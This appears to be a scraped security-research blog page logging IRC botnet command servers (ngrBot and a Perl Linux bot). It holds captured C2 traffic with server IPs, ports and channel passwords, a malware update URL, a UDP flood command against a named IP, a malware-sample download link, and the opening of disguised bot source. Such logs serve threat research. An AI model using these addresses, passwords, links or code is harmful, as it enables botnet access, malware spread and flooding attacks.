109.68.191.160(ngrBot hosted in Russian Federation Moscow Jsc Tel Company)

Remote Host Port Number 109.68.191.160 1863 PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 40 domain(s) NICK n{US|XPa}civmqel USER civmqel 0 0 :civmqel JOIN #IrcPeru PeruRulz!! JOIN #US PRIVMSG #IrcPeru :[d=”http://magicforkidsparty.com/images/Thumbs.db.exe” s=”159744 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataQcxaxq.exe” – Download retries: 0 174.120.234.158 80 199.15.234.7 80 200.63.96.41 80 PRIVMSG #IrcPeru :[DNS]: Blocked 0

119.59.99.235(ngrBot hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)

Remote Host Port Number 119.59.99.235 1234 PASS priv9 199.15.234.7 80 NICK n{US|XP}xqtebyy USER xqtebyy 0 0 :xqtebyy JOIN #ngr HELO Now talking in #ngr Topic On: [ #ngr ] [ .stop right there ] Topic By: [ bob ] * Home.Town sets mode: +o ru (ru) .udp 82.8.195.242 8080 120 (ru) .udp 82.8.195.242 8080 120

cyba.sytes.net(irc botnet hosted in Seychelles Ideal Solution Ltd)

Resolved : [cyba.sytes.net] To [193.107.16.150] Remote Host Port Number 193.107.16.150 20 NICK NEW[XX][XP]6615537921 USER 6615 “” “TsGh” :6615 MODE NEW[XX][XP]6615537921 JOIN #yup JOIN #ys PONG :irc.kittynet.com Remote Host Port Number 193.107.16.47 20 96.9.162.23 80 NICK NEW[XX][XP]4288113806 JOIN #galla PRIVMSG #galla :Down & Exc…OK PONG :irc.kittynet.com USER 4288 “” “TsGh” :4288 MODE NEW[XX][XP]4288113806 JOIN #ys PRIVMSG

90mb malware samples

another package with 90mb malware samples have fun reversing Download: http://e12ade83.urlbeat.net

216.245.202.52(linux bot hosted in United States Limestone Networks Inc)

here the bot used from heckers: #!/usr/bin/perl ################################################ use HTTP::Request; # use HTTP::Request::Common; # use HTTP::Request::Common qw(POST); # use LWP::Simple; # use LWP 5.53; # use LWP::UserAgent; # use Socket; # use IO::Socket; # use IO::Socket::INET; # use IO::Select; # use MIME::Base64; # ################################################ my $datetime = localtime; my $fakeproc = "/usr/sbin/apache2 -k start"; my

68.53.67.92(ngrBot hosted in United States Murfreesboro Comcast Cable Communications Inc)

Remote Host Port Number 199.15.234.7 80 68.53.67.92 6667 PASS .. NICK n{US|XPa}uqslazq USER uqslazq 0 0 :uqslazq PONG :9D3E1772 JOIN #!hot ngrBot Now talking in #!hot Topic On: [ #!hot ] [ !mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n ] Topic By: [ qwerty ] Modes On: [ #!hot ] [ +smntMu ] Quits: qwerty [qwerty@netadmin.ownage.net] (Quit:) heckers inside:

75.127.109.65(ngrBot hosted in United States Atlanta Global Net Access Llc)

Remote Host Port Number 199.15.234.7 80 75.127.109.65 1863 PASS ngrBot 95.211.0.131 1863 PASS ngrBot 69.64.33.227 1863 PASS ngrBot NICK n{US|XPa}wskgolo USER wskgolo 0 0 :wskgolo NICK n{US|XPa}bkwgsru USER bkwgsru 0 0 :bkwgsru NICK n{US|XPa}golxkxh USER golxkxh 0 0 :golxkxh NICK n{US|XPa}axiziqh USER axiziqh 0 0 :axiziqh to find possible chanels search in the blog for